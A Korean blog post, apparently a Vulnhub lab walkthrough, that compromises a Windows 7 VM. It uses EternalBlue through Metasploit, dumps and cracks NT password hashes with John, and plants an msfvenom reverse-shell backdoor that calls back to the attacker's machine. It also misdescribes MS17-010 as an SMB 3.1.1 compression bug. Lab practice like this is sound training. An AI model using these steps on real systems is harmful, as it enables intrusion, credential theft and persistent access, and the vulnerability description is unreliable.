vulnhub

Vulnhub[Win7 환경 실습]

sheow13 2023. 8. 16. 10:00
728x90

 Win7 환경 실습

 실습 환경

- VMware로 구성

- Kali Linux[설치 경로 : https://www.kali.org/get-kali/#kali-virtual-machines]

- Win7 실습환경

 

 진행 절차

Step 1. CTF- Win7 환경 VMware에서 부팅 시, login 페이지가 뜨나 계정 정보를 알고 있지 않음

- 해당 서버에 취약점을 이용하여 계정 정보를 몰라도 권한 탈취가 목표

[계정 정보를 몰라도 해당 사용자 계정 침투하는 것이 목표]

 

Step 2. 해당 서버 IP정보를 획득하기 위하여 Kali Linux를 활성화 후, 같은 네트워크 IP 대역 정보를 획득

- Kali LinuxBTRSysVMware에서 NAT로 같은 네트워크로 설정 필요

- VMware에서는 x.x.x.[1,2,254]는 예약된 IP로 해당 IP 이외에 탐지된 IP 확인 필요 

명령어
root@kali#arp-scan –I eth0 -l

 

Step 3. 해당 서버 Open된 포트 및 설정 정보들을 확인하기 위하여 NMAP을 사용하여 정보 수집

- Open된 포트 : SMB(135/TCP, 139/TCP, 445/TCP), MSPRC(49152/TCP etc)

- NMAP을 통해 발견한 사실 : SMB로 사용자 이름(JON-PC) 정보를 획득 Windows 7 Professional 7601 버전인 것으로 확인 SMB guest 계정도 활성화 되어 있는 것으로 확인 SMB 취약점(MS17-010)이 있는 것으로 확인

※ MS17-010 취약점(CVE-2017-0143): OS가 SMB 3.1.1 프로토콜의 압축패킷을 처리하는 과정에서 오류가 발생하여 야기되는 취약점으로, 공격자는 조작된 패킷을 악용하여 원격에서 인증을 거치지 않은 상태로 원격코드 실행이 가능한 취약점

명령어
root@kali#nmap sV script=vuln [점검할 IP]

[NMAP 조회 결과]

 

Step 4. 발견한 취약점을 활용하기 위해 metasploit을 사용하여 exploit을 진행한 결과, 정상적으로 권한 획득 확인

명령어
root@kali#metasploit
msf6 >search ms17-010
msf6 >use 0
msf6 exploit(windows/smb/ms17_010_eternalblue)>show options
msf6 exploit(windows/smb/ms17_010_eternalblue)>set RHOSTS [점검할 IP]
msf6 exploit(windows/smb/ms17_010_eternalblue)>exploit

[metasploit 실행]
[search 명령어를 통해 해당 취약점을 조회]
[show options 명령어를 통해 exploit 진행 시, 입력이 필요한 값 조회]
[MS17-010 취약점 exploit 진행 시, 공격 성공 확인]

 

Step 5. 사용자 계정 정보를 탈취하기 위하여 hashdump 명령어를 사용하여 비밀번호를 획득 후, 패스워드 크랙 도구인 john을 사용하여 크랙 시도 시, 패스워드 탈취 성공 및 정상 로그인 확인

명령어
meterpreter>hashdump
root@kali#mousepad crack
root@kali:john format=nt wordlist=/usr/share/wordlists/rockyou.txt crack

 

[hashdump 명령어를 통해 window 계정 정보를 획득]
[획득한 계정 정보를 crack하기 위하여 mousepad를 이용하여 복사]
[패스워드 crack 도구인 john을 통해 패스워드 탈취 성공]
[습득한 계정 정보를 통해 로그인 성공 확인]

 

Step 6. meterpreter를 사용하면 세션이 끊어질 가능성이 있어, backdoor 설치를 위하여 msfvenom을 사용하여 reverse shell 생성 후 업로드 시, 정상적으로 백도어 동작 확인

명령어
root@kali#msfvenom p windows/x64/shell_revesre_tcp LHOST=[Kali IP] LPORT=[open한 포트] -f exe o a.exe
meterpreter>cd /
meterpreter> mkdir tmp
meterpreter> cd tmp
meterpreter> upload a.exe

[mefvenom을 통해 리버스 쉘 생성]
[이전에 연결된 meterpreter를 통해 tmp 디렉토리 생성]
[meterpreter upload 기능을 통해 msfvenom을 통해 생성한 실행 파일 업로드 진행]
[생성한 실행 파일 클릭]
[리버스 쉘을 통한 접근 확인]

 

'vulnhub' 카테고리의 다른 글

Vulnhub [Moriarty Corp]  (1) 2023.10.17
vulnhub[hackable3 환경 실습]  (0) 2023.08.16
Vulnhub[holynix]  (0) 2023.08.16
Vulnhub[Kioptix Level1]  (0) 2023.08.16
Vulnhub[BTRsys 환경 실습]  (0) 2023.08.14